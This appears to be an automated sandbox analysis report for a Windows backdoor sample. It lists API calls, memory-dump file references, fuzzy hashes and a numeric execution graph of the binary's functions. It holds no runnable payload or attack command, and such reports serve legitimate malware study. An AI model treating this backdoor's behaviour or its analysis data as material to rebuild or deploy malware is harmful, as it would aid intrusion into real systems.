                                                      • GlobalFree.KERNEL32(00000000), ref: 00403B55
                                                      Strings
                                                      • C:\Users\user~1\AppData\Local\Temp\, xrefs: 00403B34
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1260209781.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1260196137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260225233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.0000000000793000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260528232.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                      Similarity
                                                      • API ID: Free$GlobalLibrary
                                                      • String ID: C:\Users\user~1\AppData\Local\Temp\
                                                      • API String ID: 1100898210-2382934351
                                                      • Opcode ID: 6ef17ecbb981fa3a9d26a37a654407d639bd202e425e8d1c53e2791914a5cf50
                                                      • Instruction ID: 695255c2ecde24bf448a41ac97d2e3a141eb08f66f7233a7170c0cf0b0d44fd9
                                                      • Opcode Fuzzy Hash: 6ef17ecbb981fa3a9d26a37a654407d639bd202e425e8d1c53e2791914a5cf50
                                                      • Instruction Fuzzy Hash: A0E0123390112057C6215F55FE04B5AB77D6F45B26F05403BE980BB2618B786C428BDC
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,004030E9,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe,C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe,80000000,00000003,?,?,?,?,?,0040385A,?), ref: 00405E3B
                                                      • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,004030E9,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe,C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe,80000000,00000003), ref: 00405E4B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1260209781.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1260196137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260225233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.0000000000793000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260528232.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                      Similarity
                                                      • API ID: CharPrevlstrlen
                                                      • String ID: C:\Users\user\Desktop
                                                      • API String ID: 2709904686-3976562730
                                                      • Opcode ID: 176def5b2db9ef34a9f22db2929791273b03e08e07d7b66f37effa829582f156
                                                      • Instruction ID: cbb238d5cba983021c059698dd1e30487a08ad5c01a1b7d12c600bff718c79a2
                                                      • Opcode Fuzzy Hash: 176def5b2db9ef34a9f22db2929791273b03e08e07d7b66f37effa829582f156
                                                      • Instruction Fuzzy Hash: 0ED05EB2410A209AC3126708EC04A9F63ACEF5570074A4427E581A61A4E7785E818AE8
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406254,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F7F
                                                      • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405F97
                                                      • CharNextA.USER32(00000000,?,00000000,00406254,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FA8
                                                      • lstrlenA.KERNEL32(00000000,?,00000000,00406254,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FB1
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1260209781.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1260196137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260225233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.0000000000793000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260528232.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                      Similarity
                                                      • API ID: lstrlen$CharNextlstrcmpi
                                                      • String ID:
                                                      • API String ID: 190613189-0
                                                      • Opcode ID: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
                                                      • Instruction ID: d1bddae3a0f18f97ac1aa465d67762edc6f3aabfb23b395e61e0e19fb30ac715
                                                      • Opcode Fuzzy Hash: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
                                                      • Instruction Fuzzy Hash: 50F0C231205414FFD7029FA5DE049AFBBA8EF06250B2140BAE840F7310DA78DE019BA8
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Execution Graph

                                                      Execution Coverage:3.5%
                                                      Dynamic/Decrypted Code Coverage:0%
                                                      Signature Coverage:2.6%
                                                      Total number of Nodes:2000
                                                      Total number of Limit Nodes:47
                                                      execution_graph 96326 441044 96331 442793 96326->96331 96328 44104a 96367 460413 29 API calls __onexit 96328->96367 96330 441054 96368 442a38 96331->96368 96335 44280a 96378 44bf73 96335->96378 96338 44bf73 8 API calls 96339 44281e 96338->96339 96340 44bf73 8 API calls 96339->96340 96341 442828 96340->96341 96342 44bf73 8 API calls 96341->96342 96343 442866 96342->96343 96344 44bf73 8 API calls 96343->96344 96345 442932 96344->96345 96383 442dbc 96345->96383 96349 442964 96350 44bf73 8 API calls 96349->96350 96351 44296e 96350->96351 96410 453160 96351->96410 96353 442999 96420 443166 96353->96420 96355 4429b5 96356 4429c5 GetStdHandle 96355->96356 96357 442a1a 96356->96357 96358 4839e7 96356->96358 96361 442a27 OleInitialize 96357->96361 96358->96357 96359 4839f0 96358->96359 96427 46014b 96359->96427 96361->96328 96362 4839f7 96436 4b0ac4 InitializeCriticalSectionAndSpinCount InterlockedExchange GetCurrentProcess GetCurrentProcess DuplicateHandle 96362->96436 96364 483a00 96437 4b12eb CreateThread 96364->96437 96366 483a0c CloseHandle 96366->96357 96367->96330 96438 442a91 96368->96438 96371 442a91 8 API calls 96372 442a70 96371->96372 96373 44bf73 8 API calls 96372->96373 96374 442a7c 96373->96374 96445 448577 96374->96445 96376 4427c9 96377 44327e 6 API calls 96376->96377 96377->96335 96379 46017b 8 API calls 96378->96379 96380 44bf88 96379->96380 96381 46014b 8 API calls 96380->96381 96382 442814 96381->96382 96382->96338 96384 44bf73 8 API calls 96383->96384 96385 442dcc 96384->96385 96386 44bf73 8 API calls 96385->96386 96387 442dd4 96386->96387 96480 4481d6 96387->96480 96390 4481d6 8 API calls 96391 442de4 96390->96391 96392 44bf73 8 API calls 96391->96392 96393 442def 96392->96393 96394 46014b 8 API calls 96393->96394 96395 44293c 96394->96395 96396 443205 96395->96396 96397 443213 96396->96397 96398 44bf73 8 API calls 96397->96398 96399 44321e 96398->96399 96400 44bf73 8 API calls 96399->96400 96401 443229 96400->96401 96402 44bf73 8 API calls 96401->96402 96403 443234 96402->96403 96404 44bf73 8 API calls 96403->96404 96405 44323f 96404->96405 96406 4481d6 8 API calls 96405->96406 96407 44324a 96406->96407 96408 46014b 8 API calls 96407->96408 96409 443251 RegisterWindowMessageW 96408->96409 96409->96349 96411 4531a1 96410->96411 96415 45317d 96410->96415 96483 4605b2 5 API calls __Init_thread_wait 96411->96483 96413 4531ab 96413->96415 96484 460568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96413->96484 96419 45318e 96415->96419 96485 4605b2 5 API calls __Init_thread_wait 96415->96485 96416 459f47 96416->96419 96486 460568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96416->96486 96419->96353 96421 443176 96420->96421 96422 483c8f 96420->96422 96423 46014b 8 API calls 96421->96423 96487 4b3c4e 8 API calls 96422->96487 96425 44317e 96423->96425 96425->96355 96426 483c9a 96428 460150 ___std_exception_copy 96427->96428 96429 46016a 96428->96429 96431 46016c 96428->96431 96488 46521d 7 API calls 2 library calls 96428->96488 96429->96362 96435 4609dd 96431->96435 96489 463614 RaiseException 96431->96489 96434 4609fa 96434->96362 96490 463614 RaiseException 96435->96490 96436->96364 96437->96366 96491 4b12d1 14 API calls 96437->96491 96439 44bf73 8 API calls 96438->96439 96440 442a9c 96439->96440 96441 44bf73 8 API calls 96440->96441 96442 442aa4 96441->96442 96443 44bf73 8 API calls 96442->96443 96444 442a66 96443->96444 96444->96371 96446 448587 _wcslen 96445->96446 96447 486610 96445->96447 96450 4485c2 96446->96450 96451 44859d 96446->96451 96467 44adf4 96447->96467 96449 486619 96449->96449 96453 46014b 8 API calls 96450->96453 96457 4488e8 8 API calls 96451->96457 96455 4485ce 96453->96455 96454 4485a5 __fread_nolock 96454->96376 96458 46017b 96455->96458 96457->96454 96459 46014b ___std_exception_copy 96458->96459 96460 46016a 96459->96460 96463 46016c 96459->96463 96471 46521d 7 API calls 2 library calls 96459->96471 96460->96454 96462 4609dd 96473 463614 RaiseException 96462->96473 96463->96462 96472 463614 RaiseException 96463->96472 96466 4609fa 96466->96454 96468 44ae02 96467->96468 96470 44ae0b __fread_nolock 96467->96470 96468->96470 96474 44c2c9 96468->96474 96470->96449 96471->96459 96472->96462 96473->96466 96475 44c2dc 96474->96475 96479 44c2d9 __fread_nolock 96474->96479 96476 46014b 8 API calls 96475->96476 96477 44c2e7 96476->96477 96478 46017b 8 API calls 96477->96478 96478->96479 96479->96470 96481 44bf73 8 API calls 96480->96481 96482 442ddc 96481->96482 96482->96390 96483->96413 96484->96415 96485->96416 96486->96419 96487->96426 96488->96428 96489->96435 96490->96434 96492 493c0a 96513 4ac819 96492->96513 96495 493c14 96496 493c3f 96495->96496 96497 4ac819 Sleep 96495->96497 96503 44efdb 96495->96503 96519 45aa65 9 API calls 96495->96519 96520 44b329 96496->96520 96497->96495 96501 493c8b 96527 4b446f 8 API calls 96501->96527 96506 44f450 96503->96506 96505 44f097 96507 44f483 96506->96507 96508 44f46f 96506->96508 96560 4b3fe1 81 API calls __wsopen_s 96507->96560 96528 44e960 96508->96528 96510 44f47a 96510->96505 96512 494584 96512->96512 96515 4ac824 96513->96515 96516 4ac83f 96513->96516 96514 4ac86d 96514->96495 96515->96495 96516->96514 96517 4ac85b Sleep 96516->96517 96517->96514 96519->96495 96521 44b338 _wcslen 96520->96521 96522 46017b 8 API calls 96521->96522 96523 44b360 __fread_nolock 96522->96523 96524 46014b 8 API calls 96523->96524 96525 44b376 96524->96525 96526 44bfa5 39 API calls 96525->96526 96526->96501 96527->96505 96561 450340 96528->96561 96530 44ea0b ISource 96530->96510 96531 44e99d 96531->96530 96532 44edd5 96531->96532 96534 44eac3 96531->96534 96540 44ebb8 96531->96540 96545 4931d3 96531->96545 96548 46014b 8 API calls 96531->96548 96555 44eb29 ISource __fread_nolock 96531->96555 96532->96530 96543 46017b 8 API calls 96532->96543 96534->96532 96536 44eace 96534->96536 96535 44ecff 96538 44ed14 96535->96538 96539 4931c4 96535->96539 96537 46014b 8 API calls 96536->96537 96547 44ead5 __fread_nolock 96537->96547 96541 46014b 8 API calls 96538->96541 96589 4c6162 8 API calls 96539->96589 96544 46017b 8 API calls 96540->96544 96553 44eb6a 96541->96553 96543->96547 96544->96555 96590 4b3fe1 81 API calls __wsopen_s 96545->96590 96546 46014b 8 API calls 96549 44eaf6 96546->96549 96547->96546 96547->96549 96548->96531 96549->96555 96584 44d260 243 API calls 96549->96584 96551 4931b3 96588 4b3fe1 81 API calls __wsopen_s 96551->96588 96553->96510 96555->96535 96555->96551 96555->96553 96556 49318e 96555->96556 96558 49316c 96555->96558 96585 4444fe 243 API calls 96555->96585 96587 4b3fe1 81 API calls __wsopen_s 96556->96587 96586 4b3fe1 81 API calls __wsopen_s 96558->96586 96560->96512 96579 450376 ISource 96561->96579 96562 4605b2 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 96562->96579 96563 46014b 8 API calls 96563->96579 96564 49632b 96600 4b3fe1 81 API calls __wsopen_s 96564->96600 96565 451695 96572 44bed9 8 API calls 96565->96572 96577 45049d ISource 96565->96577 96568 49625a 96599 4b3fe1 81 API calls __wsopen_s 96568->96599 96569 495cdb 96569->96577 96593 44bed9 96569->96593 96572->96577 96573 44bed9 8 API calls 96573->96579 96576 44bf73 8 API calls 96576->96579 96577->96531 96578 460413 29 API calls pre_c_initialization 96578->96579 96579->96562 96579->96563 96579->96564 96579->96565 96579->96568 96579->96569 96579->96573 96579->96576 96579->96577 96579->96578 96580 496115 96579->96580 96581 460568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 96579->96581 96583 450aae ISource 96579->96583 96591 451990 243 API calls 2 library calls 96579->96591 96592 451e50 40 API calls ISource 96579->96592 96597 4b3fe1 81 API calls __wsopen_s 96580->96597 96581->96579 96598 4b3fe1 81 API calls __wsopen_s 96583->96598 96584->96555 96585->96555 96586->96553 96587->96553 96588->96553 96589->96545 96590->96530 96591->96579 96592->96579 96594 44beed 96593->96594 96596 44befc __fread_nolock 96593->96596 96595 46017b 8 API calls 96594->96595 96594->96596 96595->96596 96596->96577 96597->96583 96598->96577 96599->96577 96600->96577 96601 4950ca 96612 44f800 ISource 96601->96612 96603 451ca0 8 API calls 96603->96612 96605 44bf73 8 API calls 96605->96612 96606 44fae1 96608 44bed9 8 API calls 96608->96612 96610 4b3fe1 81 API calls 96610->96612 96612->96603 96612->96605 96612->96606 96612->96608 96612->96610 96613 450340 243 API calls 96612->96613 96616 44be2d 96612->96616 96620 45b35c 243 API calls 96612->96620 96621 4605b2 5 API calls __Init_thread_wait 96612->96621 96622 460413 29 API calls __onexit 96612->96622 96623 460568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96612->96623 96624 4c5231 101 API calls 96612->96624 96625 4c731e 243 API calls 96612->96625 96613->96612 96617 44be38 96616->96617 96618 44be67 96617->96618 96626 44bfa5 39 API calls 96617->96626 96618->96612 96620->96612 96621->96612 96622->96612 96623->96612 96624->96612 96625->96612 96626->96618 96627 44f4c0 96630 45a025 96627->96630 96629 44f4cc 96631 45a046 96630->96631 96636 45a0a3 96630->96636 96632 450340 243 API calls 96631->96632 96631->96636 96637 45a077 96632->96637 96634 49806b 96634->96634 96635 45a0e7 96635->96629 96636->96635 96639 4b3fe1 81 API calls __wsopen_s 96636->96639 96637->96635 96637->96636 96638 44bed9 8 API calls 96637->96638 96638->96636 96639->96634 96640 478782 96645 47853e 96640->96645 96643 4787aa 96646 47856f try_get_first_available_module 96645->96646 96653 4786b8 96646->96653 96660 46917b 40 API calls 2 library calls 96646->96660 96648 47876e 96664 472b5c 26 API calls __fread_nolock 96648->96664 96650 4786c3 96650->96643 96657 480d04 96650->96657 96652 47870c 96652->96653 96661 46917b 40 API calls 2 library calls 96652->96661 96653->96650 96663 46f649 20 API calls _abort 96653->96663 96655 47872b 96655->96653 96662 46917b 40 API calls 2 library calls 96655->96662 96665 480401 96657->96665 96659 480d1f 96659->96643 96660->96652 96661->96655 96662->96653 96663->96648 96664->96650 96668 48040d BuildCatchObjectHelperInternal 96665->96668 96666 48041b 96723 46f649 20 API calls _abort 96666->96723 96668->96666 96670 480454 96668->96670 96669 480420 96724 472b5c 26 API calls __fread_nolock 96669->96724 96676 4809db 96670->96676 96674 48042a __fread_nolock 96674->96659 96726 4807af 96676->96726 96679 480a0d 96758 46f636 20 API calls _abort 96679->96758 96680 480a26 96744 475594 96680->96744 96683 480a12 96759 46f649 20 API calls _abort 96683->96759 96684 480a2b 96685 480a4b 96684->96685 96686 480a34 96684->96686 96757 48071a CreateFileW 96685->96757 96760 46f636 20 API calls _abort 96686->96760 96690 480a39 96761 46f649 20 API calls _abort 96690->96761 96692 480b01 GetFileType 96694 480b0c GetLastError 96692->96694 96695 480b53 96692->96695 96693 480ad6 GetLastError 96763 46f613 20 API calls __dosmaperr 96693->96763 96764 46f613 20 API calls __dosmaperr 96694->96764 96766 4754dd 21 API calls 2 library calls 96695->96766 96697 480a84 96697->96692 96697->96693 96762 48071a CreateFileW 96697->96762 96699 480b1a CloseHandle 96699->96683 96701 480b43 96699->96701 96765 46f649 20 API calls _abort 96701->96765 96703 480ac9 96703->96692 96703->96693 96705 480b74 96710 480bc0 96705->96710 96767 48092b 72 API calls 3 library calls 96705->96767 96706 480b48 96706->96683 96709 480be6 96711 480bed 96709->96711 96712 480bfe 96709->96712 96710->96711 96768 4804cd 72 API calls 4 library calls 96710->96768 96769 478a2e 96711->96769 96714 480478 96712->96714 96715 480c7c CloseHandle 96712->96715 96725 4804a1 LeaveCriticalSection __wsopen_s 96714->96725 96784 48071a CreateFileW 96715->96784 96717 480ca7 96718 480cb1 GetLastError 96717->96718 96719 480cdd 96717->96719 96785 46f613 20 API calls __dosmaperr 96718->96785 96719->96714 96721 480cbd 96786 4756a6 21 API calls 2 library calls 96721->96786 96723->96669 96724->96674 96725->96674 96727 4807d0 96726->96727 96728 4807ea 96726->96728 96727->96728 96794 46f649 20 API calls _abort 96727->96794 96787 48073f 96728->96787 96731 4807df 96795 472b5c 26 API calls __fread_nolock 96731->96795 96733 480822 96734 480851 96733->96734 96796 46f649 20 API calls _abort 96733->96796 96742 4808a4 96734->96742 96798 46da7d 26 API calls 2 library calls 96734->96798 96737 48089f 96739 48091e 96737->96739 96737->96742 96738 480846 96797 472b5c 26 API calls __fread_nolock 96738->96797 96799 472b6c 11 API calls _abort 96739->96799 96742->96679 96742->96680 96743 48092a 96745 4755a0 BuildCatchObjectHelperInternal 96744->96745 96802 4732d1 EnterCriticalSection 96745->96802 96747 4755a7 96748 4755cc 96747->96748 96753 47563a EnterCriticalSection 96747->96753 96755 4755ee 96747->96755 96806 475373 96748->96806 96751 475617 __fread_nolock 96751->96684 96754 475647 LeaveCriticalSection 96753->96754 96753->96755 96754->96747 96803 47569d 96755->96803 96757->96697 96758->96683 96759->96714 96760->96690 96761->96683 96762->96703 96763->96683 96764->96699 96765->96706 96766->96705 96767->96710 96768->96709 96832 475737 96769->96832 96771 478a44 96845 4756a6 21 API calls 2 library calls 96771->96845 96773 478a3e 96773->96771 96774 478a76 96773->96774 96777 475737 __wsopen_s 26 API calls 96773->96777 96774->96771 96775 475737 __wsopen_s 26 API calls 96774->96775 96778 478a82 FindCloseChangeNotification 96775->96778 96776 478a9c 96779 478abe 96776->96779 96846 46f613 20 API calls __dosmaperr 96776->96846 96780 478a6d 96777->96780 96778->96771 96781 478a8e GetLastError 96778->96781 96779->96714 96783 475737 __wsopen_s 26 API calls 96780->96783 96781->96771 96783->96774 96784->96717 96785->96721 96786->96719 96789 480757 96787->96789 96788 480772 96788->96733 96789->96788 96800 46f649 20 API calls _abort 96789->96800 96791 480796 96801 472b5c 26 API calls __fread_nolock 96791->96801 96793 4807a1 96793->96733 96794->96731 96795->96728 96796->96738 96797->96734 96798->96737 96799->96743 96800->96791 96801->96793 96802->96747 96814 473319 LeaveCriticalSection 96803->96814 96805 4756a4 96805->96751 96815 474ff0 96806->96815 96808 475392 96823 472d38 96808->96823 96809 475385 96809->96808 96822 473778 11 API calls 2 library calls 96809->96822 96812 4753e4 96812->96755 96813 4754ba EnterCriticalSection 96812->96813 96813->96755 96814->96805 96820 474ffd pre_c_initialization 96815->96820 96816 47503d 96830 46f649 20 API calls _abort 96816->96830 96817 475028 RtlAllocateHeap 96818 47503b 96817->96818 96817->96820 96818->96809 96820->96816 96820->96817 96829 46521d 7 API calls 2 library calls 96820->96829 96822->96809 96824 472d43 RtlFreeHeap 96823->96824 96828 472d6c __dosmaperr 96823->96828 96825 472d58 96824->96825 96824->96828 96831 46f649 20 API calls _abort 96825->96831 96827 472d5e GetLastError 96827->96828 96828->96812 96829->96820 96830->96818 96831->96827 96833 475744 96832->96833 96834 475759 96832->96834 96847 46f636 20 API calls _abort 96833->96847 96838 47577e 96834->96838 96849 46f636 20 API calls _abort 96834->96849 96837 475749 96848 46f649 20 API calls _abort 96837->96848 96838->96773 96839 475789 96850 46f649 20 API calls _abort 96839->96850 96842 475751 96842->96773 96843 475791 96851 472b5c 26 API calls __fread_nolock 96843->96851 96845->96776 96846->96779 96847->96837 96848->96842 96849->96839 96850->96843 96851->96842 96852 46f06e 96853 46f07a BuildCatchObjectHelperInternal 96852->96853 96854 46f086 96853->96854 96855 46f09b 96853->96855 96871 46f649 20 API calls _abort 96854->96871 96865 4694fd EnterCriticalSection 96855->96865 96858 46f08b 96872 472b5c 26 API calls __fread_nolock 96858->96872 96859 46f0a7 96866 46f0db 96859->96866 96864 46f096 __fread_nolock 96865->96859 96874 46f106 96866->96874 96868 46f0e8 96870 46f0b4 96868->96870 96894 46f649 20 API calls _abort 96868->96894 96873 46f0d1 LeaveCriticalSection __fread_nolock 96870->96873 96871->96858 96872->96864 96873->96864 96875 46f114 96874->96875 96876 46f12e 96874->96876 96905 46f649 20 API calls _abort 96875->96905 96895 46dcc5 96876->96895 96879 46f119 96906 472b5c 26 API calls __fread_nolock 96879->96906 96880 46f137 96902 479789 96880->96902 96884 46f1bf 96887 46f1dc 96884->96887 96893 46f1ee 96884->96893 96885 46f23b 96886 46f248 96885->96886 96885->96893 96908 46f649 20 API calls _abort 96886->96908 96907 46f41f 31 API calls 4 library calls 96887->96907 96890 46f1e6 96891 46f124 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 96890->96891 96891->96868 96893->96891 96909 46f29b 30 API calls 2 library calls 96893->96909 96894->96870 96896 46dce6 96895->96896 96897 46dcd1 96895->96897 96896->96880 96910 46f649 20 API calls _abort 96897->96910 96899 46dcd6 96911 472b5c 26 API calls __fread_nolock 96899->96911 96901 46dce1 96901->96880 96912 479606 96902->96912 96904 46f153 96904->96884 96904->96885 96904->96891 96905->96879 96906->96891 96907->96890 96908->96891 96909->96891 96910->96899 96911->96901 96913 479612 BuildCatchObjectHelperInternal 96912->96913 96914 479632 96913->96914 96915 47961a 96913->96915 96916 4796e6 96914->96916 96921 47966a 96914->96921 96947 46f636 20 API calls _abort 96915->96947 96952 46f636 20 API calls _abort 96916->96952 96919 47961f 96948 46f649 20 API calls _abort 96919->96948 96920 4796eb 96953 46f649 20 API calls _abort 96920->96953 96937 4754ba EnterCriticalSection 96921->96937 96923 479627 __fread_nolock 96923->96904 96926 4796f3 96954 472b5c 26 API calls __fread_nolock 96926->96954 96927 479670 96929 479694 96927->96929 96930 4796a9 96927->96930 96949 46f649 20 API calls _abort 96929->96949 96938 47970b 96930->96938 96933 479699 96950 46f636 20 API calls _abort 96933->96950 96935 4796a4 96951 4796de LeaveCriticalSection __wsopen_s 96935->96951 96937->96927 96939 475737 __wsopen_s 26 API calls 96938->96939 96940 47971d 96939->96940 96941 479736 SetFilePointerEx 96940->96941 96942 479725 96940->96942 96944 47974e GetLastError 96941->96944 96946 47972a 96941->96946 96955 46f649 20 API calls _abort 96942->96955 96956 46f613 20 API calls __dosmaperr 96944->96956 96946->96935 96947->96919 96948->96923 96949->96933 96950->96935 96951->96923 96952->96920 96953->96926 96954->96923 96955->96946 96956->96946 96957 491ac5 96958 491acd 96957->96958 96961 44d535 96957->96961 97003 4a7a87 8 API calls __fread_nolock 96958->97003 96960 491adf 97004 4a7a00 8 API calls __fread_nolock 96960->97004 96963 46014b 8 API calls 96961->96963 96965 44d589 96963->96965 96964 491b09 96966 450340 243 API calls 96964->96966 96987 44c32d 96965->96987 96967 491b30 96966->96967 96969 491b44 96967->96969 97005 4c61a2 53 API calls _wcslen 96967->97005 96972 46014b 8 API calls 96977 44d66e ISource 96972->96977 96973 491b61 96973->96961 97006 4a7a87 8 API calls __fread_nolock 96973->97006 96975 44c3ab 8 API calls 96978 44d9ac ISource 96975->96978 96981 491f79 96977->96981 96983 491f94 96977->96983 96984 44bed9 8 API calls 96977->96984 96986 44d911 ISource 96977->96986 96994 44c3ab 96977->96994 97007 44b4c8 8 API calls 96977->97007 96980 44d9c3 96978->96980 97002 45e30a 8 API calls ISource 96978->97002 97008 4a56ae 8 API calls ISource 96981->97008 96984->96977 96986->96975 96986->96978 96990 44c33d 96987->96990 96988 44c345 96988->96972 96989 46014b 8 API calls 96989->96990 96990->96988 96990->96989 96991 44bf73 8 API calls 96990->96991 96992 44bed9 8 API calls 96990->96992 96993 44c32d 8 API calls 96990->96993 96991->96990 96992->96990 96993->96990 96995 44c3e1 ISource 96994->96995 96996 44c3b9 96994->96996 96995->96977 96997 44c3c7 96996->96997 96998 44c3ab 8 API calls 96996->96998 96999 44c3cd 96997->96999 97000 44c3ab 8 API calls 96997->97000 96998->96997 96999->96995 97009 44c7e0 8 API calls ISource 96999->97009 97000->96999 97002->96978 97003->96960 97004->96964 97005->96973 97006->96973 97007->96977 97008->96983 97009->96995 97010 46076b 97011 460777 BuildCatchObjectHelperInternal 97010->97011 97040 460221 97011->97040 97013 46077e 97014 4608d1 97013->97014 97017 4607a8 97013->97017 97078 460baf IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 97014->97078 97016 4608d8 97079 4651c2 28 API calls _abort 97016->97079 97028 4607e7 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 97017->97028 97051 4727ed 97017->97051 97019 4608de 97080 465174 28 API calls _abort 97019->97080 97023 4608e6 97024 4607c7 97026 460848 97059 460cc9 97026->97059 97028->97026 97074 46518a 38 API calls 2 library calls 97028->97074 97029 46084e 97063 44331b 97029->97063 97034 46086a 97034->97016 97035 46086e 97034->97035 97036 460877 97035->97036 97076 465165 28 API calls _abort 97035->97076 97077 4603b0 13 API calls 2 library calls 97036->97077 97039 46087f 97039->97024 97041 46022a 97040->97041 97081 460a08 IsProcessorFeaturePresent 97041->97081 97043 460236 97082 463004 10 API calls 3 library calls 97043->97082 97045 46023b 97046 46023f 97045->97046 97083 472687 97045->97083 97046->97013 97049 460256 97049->97013 97054 472804 97051->97054 97052 460dfc __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 97053 4607c1 97052->97053 97053->97024 97055 472791 97053->97055 97054->97052 97056 4727c0 97055->97056 97057 460dfc __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 97056->97057 97058 4727e9 97057->97058 97058->97028 97134 4626b0 97059->97134 97062 460cef 97062->97029 97064 443382 97063->97064 97065 443327 IsThemeActive 97063->97065 97075 460d02 GetModuleHandleW 